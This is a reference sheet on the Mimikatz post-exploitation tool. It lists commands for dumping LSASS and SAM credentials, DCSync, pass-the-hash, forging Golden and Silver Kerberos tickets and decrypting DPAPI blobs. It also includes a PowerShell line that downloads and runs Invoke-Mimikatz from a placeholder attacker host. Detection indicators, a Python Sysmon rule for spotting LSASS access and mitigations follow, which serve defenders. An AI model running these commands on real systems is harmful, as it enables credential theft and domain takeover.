Mimikatz
Overview
Mimikatz is a Windows post-exploitation tool for extracting credentials from memory, forging Kerberos tickets, and manipulating Windows authentication. It runs on the target Windows system and requires administrator or SYSTEM privileges for most operations. Mimikatz is the primary tool for LSASS credential dumping, Golden/Silver Ticket attacks, and pass-the-hash/pass-the-ticket on Windows.
ATT&CK Mapping
- Tactic: TA0006 - Credential Access
- Technique: T1003.001 - OS Credential Dumping: LSASS Memory
Key Modules
sekurlsa — Credential Extraction
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
# Dump all credentials from LSASS
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords
# Export all Kerberos tickets from memory
mimikatz# sekurlsa::tickets /export
# Pass-the-hash — spawn process with NTLM hash
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>
# Pass-the-hash with AES key
mimikatz# sekurlsa::pth /user:<user> /domain:<domain> /aes256:<key>
# Dump credentials from individual providers (MSV/NTLM hashes, WDigest, Kerberos)
mimikatz# sekurlsa::msv
mimikatz# sekurlsa::wdigest
mimikatz# sekurlsa::kerberos
lsadump — SAM/NTDS/DCSync
# Dump local SAM database
mimikatz# lsadump::sam
# Dump SAM from hive files
mimikatz# lsadump::sam /sam:SAM /system:SYSTEM
# Dump LSA secrets
mimikatz# lsadump::secrets
# Dump cached domain credentials
mimikatz# lsadump::cache
# DCSync — replicate specific user's credentials
mimikatz# lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz# lsadump::dcsync /domain:<domain> /user:krbtgt
# DCSync — all users
mimikatz# lsadump::dcsync /domain:<domain> /all /csv
kerberos — Ticket Operations
# List current Kerberos tickets
mimikatz# kerberos::list
# Export tickets to .kirbi files
mimikatz# kerberos::list /export
# Purge all tickets
mimikatz# kerberos::purge
# Pass the ticket — inject .kirbi into session
mimikatz# kerberos::ptt <ticket.kirbi>
# Golden Ticket — forge TGT
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<hash> /ptt
# Silver Ticket — forge TGS
mimikatz# kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /target:<host> /service:cifs /rc4:<hash> /ptt
token — Token Manipulation
# Elevate to SYSTEM
mimikatz# token::elevate
# Elevate to domain admin (if token available)
mimikatz# token::elevate /domainadmin
# Revert to original token
mimikatz# token::revert
vault / dpapi — Credential Stores
# List Windows Credential Manager entries
mimikatz# vault::list
# DPAPI masterkey extraction
mimikatz# dpapi::masterkey /in:<masterkey_file> /sid:<user_sid> /password:<password>
# Decrypt DPAPI credential blob
mimikatz# dpapi::cred /in:<credential_file> /masterkey:<masterkey>
Common Workflows
Initial Setup
# Enable debug privilege (required for most operations)
mimikatz# privilege::debug
# Show the current token (confirm whether running as SYSTEM)
mimikatz# token::whoami
One-Liner Execution
:: Run mimikatz with commands inline
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
:: DCSync one-liner
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.local /user:Administrator" "exit"
PowerShell (Invoke-Mimikatz)
# Download and execute in memory
IEX (New-Object Net.WebClient).DownloadString('http://<attacker>/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
Detection Methods
Host-Based Detection
- Process named mimikatz.exe or mimi.exe
- LSASS process access from non-system processes (Sysmon Event ID 10)
- DLL injection into LSASS
- String patterns: mimikatz, gentilkiwi, sekurlsa
- AMSI detections for PowerShell-based Mimikatz
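Added example (not part of the original cheat sheet): a small Python rule over constructed Sysmon Event ID 10 (ProcessAccess) records that applies the host-based indicators above, flagging LSASS handle opens from non-system processes, Mimikatz-style image names, write access consistent with DLL injection, and call traces from memory not backed by a module. The sample records and the allow-list of system processes are assumptions to tune per environment.

```python
import re

# Sysmon Event ID 10 (ProcessAccess) fields, named as Sysmon names them. These
# records are constructed sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe", "GrantedAccess": "0x1000",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204"},
    {"SourceImage": r"C:\Users\alice\Downloads\mimikatz.exe", "GrantedAccess": "0x1010",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204"},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "GrantedAccess": "0x1410",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|UNKNOWN(048A1F20)"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe", "GrantedAccess": "0x1010",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204"},
]

# Process access rights (winnt.h) that matter for reading or tampering with LSASS memory.
PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_VM_OPERATION = 0x0010, 0x0020, 0x0008

# Assumed allow-list of system binaries that legitimately open LSASS; tune it per
# environment (EDR agents, backup software) before turning the rule on.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
                   r"c:\windows\system32\services.exe"}
TOOL_NAME = re.compile(r"mimikatz|mimi\b|gentilkiwi|sekurlsa", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze_lsass_access(event):
    """Return detection reasons for one Event ID 10 record (empty list = benign)."""
    if basename(event["TargetImage"]) != "lsass.exe":
        return []                                   # only LSASS handles are of interest
    source = event["SourceImage"]
    if source.lower() in ALLOWED_SOURCES:
        return []
    access, reasons = int(event["GrantedAccess"], 16), []
    if access & PROCESS_VM_READ:                    # 0x1010 / 0x1410 are the classic masks
        reasons.append("non-system process requested PROCESS_VM_READ on LSASS")
    if access & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION):
        reasons.append("write access to LSASS memory (possible DLL injection)")
    if TOOL_NAME.search(basename(source)):
        reasons.append("source image name matches Mimikatz naming")
    if "UNKNOWN(" in event.get("CallTrace", ""):
        reasons.append("call trace not backed by a module (in-memory loader)")
    return reasons

def scan(events):
    """Map each offending SourceImage to its reasons; benign records are dropped."""
    return {e["SourceImage"]: r for e in events if (r := analyze_lsass_access(e))}
```

Renamed binaries defeat the name check but not the access-mask and call-trace checks, which is why the rule keeps all four signals instead of relying on the process name alone.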
Mitigation Strategies
- Credential Guard — prevents LSASS from storing cleartext passwords and NTLM hashes
- Protected Process Light (PPL) — prevents non-protected processes from accessing LSASS
- Disable WDigest — prevent cleartext password caching (registry value UseLogonCredential)
- LSASS protection — enable RunAsPPL in the registry